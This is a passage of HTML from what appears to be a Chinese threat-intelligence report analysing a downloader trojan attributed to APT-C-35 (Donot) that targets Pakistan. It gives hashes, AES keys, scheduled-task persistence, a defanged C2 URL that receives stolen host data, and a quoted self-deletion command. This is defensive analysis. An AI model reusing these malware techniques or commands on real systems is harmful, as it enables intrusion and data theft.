data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">A4B5C6</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件移动（重命名）</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">D7E8F9</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件夹相关操作</span></span></p></td></tr></tbody></table><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 三、关联分析 </span></span></strong></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">与此同时，我们还关联到肚脑虫组织的另一款下载器木马，与本次分析的样本存在相同的数字签名信息，基础信息如下。</span></span></p></div></div><table style="width:577px;"><tbody><tr><td data-colwidth="118"><p><span leaf="">MD5</span></p></td><td data-colwidth="459"><p><span leaf="">20c9ac59c444625a7ee364b410da8f11</span></p></td></tr><tr><td data-colwidth="118"><p><span leaf="">文件名称</span></p></td><td data-colwidth="459"><p><span leaf="">suv3xx.exe</span></p></td></tr><tr><td data-colwidth="118"><p><span leaf="">文件大小</span></p></td><td data-colwidth="459"><p><span leaf="">602.60 KB (617064 bytes)</span></p></td></tr><tr><td data-colwidth="118"><p><span leaf="">文件类型</span></p></td><td data-colwidth="459"><p><span leaf="">exe</span></p></td></tr></tbody></table><p><span leaf=""><img data-imgfileid="100023934" class="rich_pages wxw-img" data-ratio="0.6979166666666666" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=bb83e984&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczic97JBOicnZ3crpdOXRXFGTF940HmmAJE14vQD5ia0LGyibPLbiaqPKZTrZA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">样本在运行初期会创建名为“twt”的互斥体（Mutex），通过此机制实现单实例控制。</span></span></p><p><span leaf=""><img data-imgfileid="100023935" class="rich_pages wxw-img" data-ratio="0.14814814814814814" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=3dfbb06e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicN6Gia6fARctlRQdGmzbaSAoofh0sPYN80UBbFtpw59NkxIfhZqD7wJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">样本中的敏感字符串均未以明文形式存储，而是采用Base64编码+AES对称加密的组合方式进行保护。</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Key:AB BD 3A 7B 8C B2 B4 C6 AB C7 D9 09 E4 E5 C2 C1，</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">Iv:BB B3 44 58 95 B3 C7 E1 75 C6 E7 D6 D9 D5 BD DB。</span></span></p></td></tr></tbody></table><p><span leaf=""><img data-imgfileid="100023936" class="rich_pages wxw-img" data-ratio="0.3630057803468208" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=95cd4d53&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicqy331rwFn25YQicW3DLSzHLeTrEuXibCael1KYD5aHJia3QFg89MqpNkQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着通过COM组件创建名为“.NET Framework NGEN v4.0.30319 64Update”的计划任务，实现样本持久化操作。</span></span></p><p><span leaf=""><img data-imgfileid="100023937" class="rich_pages wxw-img" data-ratio="0.4867052023121387" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ee7e12d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicUhsC7bgfvtBQY5iayREBKZd3B75sS9MuNrfBMFWqBFqKyJT8KJgMQ3A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-imgfileid="100023938" class="rich_pages wxw-img" data-ratio="0.17844727694090382" data-type="png" data-w="863" src="https://wechat2rss.xlab.app/img-proxy/?k=f1dadf61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczic8zq3E2HtDOOhguFfichHfL7bXpwMT0UkibVFodwWyIvEmzmia19tSnF2g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着开始对受害主机进行窃密行为，获取主机的CPU信息、Windows版本、用户名、计算机名、安装软件列表等信息。通过AES+Base64进行数据加密，再与“mopd=”字符串进行拼接。</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023939" class="rich_pages wxw-img" data-ratio="0.24768518518518517" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=f81ab46f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicBeiauBAHo93YMDARoaBDDS70GWsu05wDTeljNXY9vWbR2OiaMhXAlgTQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">创建C:\ProgramData\pintok\gkl.lok文件，将加密的用户基础信息写入到文件中。</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023940" class="rich_pages wxw-img" data-ratio="0.13410404624277455" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=439f7661&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczictE1bpvergge0VgkcSE9DAqvsqj00KbFtG7xbFFDGEMROoOdsr6ctCg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">解密的配置信息如下图。</span></span></p><p><span leaf=""><img data-imgfileid="100023941" class="rich_pages wxw-img" data-ratio="0.24508670520231213" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=81991f4b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicvo6DRm6icqoayNHAbudzicVTNjL6VXAy8vooHmkQlQwYCfibUVN1jyzRQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">连接<a href="https://brityservice[.]info:443//ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh，接着将加密的用户敏感数据作为上线包发送至服务器。" target="_blank">https://brityservice[.]info:443//ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh，接着将加密的用户敏感数据作为上线包发送至服务器。</a></span></span></p><p><span leaf=""><img data-imgfileid="100023942" class="rich_pages wxw-img" data-ratio="0.3125" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=0a5d266b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCicziclGnSopsRwRYQuwnwJmRZI5KhQTEfaHeicmc7Nd1WZ0sPicHrld1Yl7nQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">检查接收的数据是否包含“MFG”以及“？”字符串，接收数据需符合相应格式才会下载后续组件。</span></span></p><p><span leaf=""><img data-imgfileid="100023943" class="rich_pages wxw-img" data-ratio="0.44675925925925924" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=31c3b4b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicGadKLjBOzNmFGibgIgoTbHNdGUr5dtov1u0ZcHCL570G2D5ZHsM8m6Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-imgfileid="100023944" class="rich_pages wxw-img" data-ratio="0.23583815028901733" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=9e571763&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicvMYyPVicaXs6cvaAJPVPpXicQQuheWUz7GZ1VTdiaIGialZyRFeOGDPsNw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">再次连接服务器，url路径为ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh/N1/SA，接着发送加密数据，解密后格式如下：用户名-计算机名-b0671##<a class="wx_topic_link" topic-id="miha0d0r-x69lsc" style="color: #576B95 !important;" data-topic="1">#Dl1104KillJunk32</a>.dll。然后创建C:\Users\[username]\AppData\Local\EdgeUpdate\Wi0m.dll文件并写入数据。</span></span></p><p><span leaf=""><img data-imgfileid="100023945" class="rich_pages wxw-img" data-ratio="0.8404624277456647" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=027968d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicX7EwFqqqgbRzDIkzyv9s2iaAtIEjkybkmho6luFsbEZgQeIia1BGDMdg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">样本会在系统中创建新的计划任务，以实现持久化驻留。该任务的执行内容为调用rundll32.exe加载并执行指定的恶意 DLL 文件，从而在系统重启自动重新激活样本。</span></span></p><p><span leaf=""><img data-imgfileid="100023946" class="rich_pages wxw-img" data-ratio="0.19328703703703703" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=11f8a92d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicPVKWf1TdnoI7mZuZicAs8VRPmLQ9tQM4icVric02Vmc8Qe64ibqr7xx7hw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">最后执行“cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 &gt; Nul &amp; Del /f /q &#34;%s&#34;”，将下载器样本删除。</span></span></p><p><span leaf=""><img data-imgfileid="100023947" class="rich_pages wxw-img" data-ratio="0.3587962962962963" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=d33425ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicsicoia6jRRnk8MUUNp6Pf0icnAfA6ib673wA43lnEmXvo8Hjy39nPGx41w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">遗憾的是，目前已无法下载到后续的攻击载荷。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 四、归属研判 </span></span></strong></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">1. 根据诱饵文档推测此次的攻击活动目标为巴基斯坦，符合攻击者目标。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">2. 关联的下载器样本与历史APT-C-35（肚脑虫）组织的攻击武器代码存在较高相似度。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在下载器样本中，针对目标用户的敏感信息存储格式以及数据加密部分和以往APT-C-35（肚脑虫）组织的攻击武器保持高度一致，将窃取的数据进行AES+Base64加密并与某字符串进行拼接，最后作为上线包上传至服务器。上线包格式都是以“字符串=”为前缀。</span></span></p><p><span leaf=""><img data-imgfileid="100023950" class="rich_pages wxw-img" data-ratio="0.1205098493626883" data-type="png" data-w="863" src="https://wechat2rss.xlab.app/img-proxy/?k=2dc2345d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicvOouLPnNQtKdw1CObxYbC5643pYQm4ibZbvic8wmYpfUMzfDMaz7kx9Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">其对C2返回数据处理逻辑也均是，判断首字节是否为“？”字符串，并判断返回数据中是否携带特定三字节字符。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该下载器样本与该组织历史攻击武器的逻辑一致，从远程服务器下载dll文件并保存到本地，创建计划任务进行持久化操作，而任务的执行内容都为调用rundll32.exe加载并执行指定的恶意DLL文件。</span></span></p><p><span leaf=""><img data-imgfileid="100023951" class="rich_pages wxw-img" data-ratio="0.223121387283237" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=7caa08a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczic4uzkgEcez9E8v6aEB1pUQz2t5H5m1C2ibyr0VKos11FibNB1lyUgblMQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">3.针对brityservice.info进行测绘，我们发现，该域名的jarm指纹信息为“28d28d28d00028d00042d42d00000051af7d8070a18e002eaaedf620fa118c”以及证书是Let&#39;s Encrypt、域名是.info域名，以上都符合我们所掌握的该组织基础设施测绘特征。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">4.下载器木马与本次的分析的样本具有相同的证书，证书路径、序列号等信息均保持一致，属于强关联证据，表明签名文件由同一实体控制。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">综上所述，我们将此次攻击活动归属APT-C-35（肚脑虫）组织。</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="3 11 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer"><div data-tools="135编辑器" data-id="101849"><div style="margin-top: 10px;margin-bottom: 10px;"><div style="margin-bottom: -15px;display: flex;transform: rotate(0deg);"><p data-brushtype="text" style="padding-right: 1em;padding-left: 1em;color: rgb(242, 242, 242);line-height: 32px;height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 17px;"><span leaf="">总结</span></span></strong></span></p></div><div style="margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;"><div data-autoskip="1" style="line-height: 1.75em;letter-spacing: 1.5px;font-size: 14px;"><p style="text-indent: 2em;"><span style="color: rgb(51, 51, 51);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;color: rgb(51, 51, 51);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(242, 242, 242);"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft 